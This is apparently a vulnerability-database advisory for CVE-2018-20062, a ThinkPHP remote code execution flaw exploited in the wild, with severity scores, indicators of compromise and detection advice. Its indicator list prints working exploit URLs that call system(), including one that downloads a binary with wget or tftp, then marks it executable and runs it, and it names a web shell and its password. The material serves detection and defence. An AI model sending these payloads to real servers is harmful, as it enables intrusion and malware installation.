CVE-2018-20062
published 2018-12-11

Priority: P1, 93
Severity: critical, 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: KEV | ITW | EXPLOIT | Initial access
CISA Known Exploited Vulnerability, due 2022-05-03
Exploited in the wild
EPSS: 99.53% (99.9th percentile)

An issue was discovered in NoneCms V1.3. thinkphp/library/think/App.php allows remote attackers to execute arbitrary PHP code via crafted use of the filter parameter, as demonstrated by the s=index/\think\Request/input&filter=phpinfo&data=1 query string.

Affected

1 range

Vendor    Product    Version range    Fixed in
5none     nonecms    -                -

Detection & IOCs (extracted from sources)

url: s=index/\think\Request/input&filter=phpinfo&data=1
url: /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
url: /index.php?s=captcha
url: /?s=/index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=(wget%20http://%J/%T%20-O%20%N||/bin/busybox%20tftp%20-g%20-l%20%N%20-r%20%T%20%I);chmod%20777%20%N;./%N%20a%J%20a%J
filename: public.txt
filename: roeter.php
command: _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id
port: 8080
bytes: XOR key 0x87, cumulative byte-wise XOR string encryption

  • Detect exploit attempts by looking for HTTP requests to /index.php containing the 's' parameter with '\think\app/invokefunction' or '\think\Request/input' combined with 'filter' and 'call_user_func_array' in the query string.
  • Alert on HTTP responses from ThinkPHP servers that include a 404 status code with a body matching 'copyright.*ThinkPHP', which indicates a vulnerable unpatched instance fingerprinted by attackers.
  • Monitor web server directories for creation of files named 'roeter.php' or downloads of 'public.txt', which are indicators of Dama web shell deployment following exploitation.
  • The Dama web shell uses the password 'admin' for authentication; monitor for POST requests to 'roeter.php' with this credential as a detection signal.
  • Track the AutoFocus tag 'HideNSeek' to identify related malware samples leveraging this ThinkPHP exploit.
  • The Metasploit module defaults to port 8080 for ThinkPHP targets, but real-world deployments may run on port 80 or 443; adjust RPORT accordingly.
  • The module automatically attempts to detect the ThinkPHP version and selects between two distinct exploit paths (invokefunction GET for <=5.0.22, captcha POST for 5.0.23); both paths must be covered in detection rules.
  • Payload delivery servers in the Dama web shell campaign are themselves compromised ThinkPHP hosts (located in Hong Kong), so blocking those IPs may be insufficient as infrastructure rotates through victim nodes.

CVSS provenance

Source       Version    Score    Severity    Vector
nvd          v3.1       9.8      CRITICAL    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd          v2.0       7.5      HIGH        AV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck    -          9.8      CRITICAL    -
cisa         -          9.8      CRITICAL    -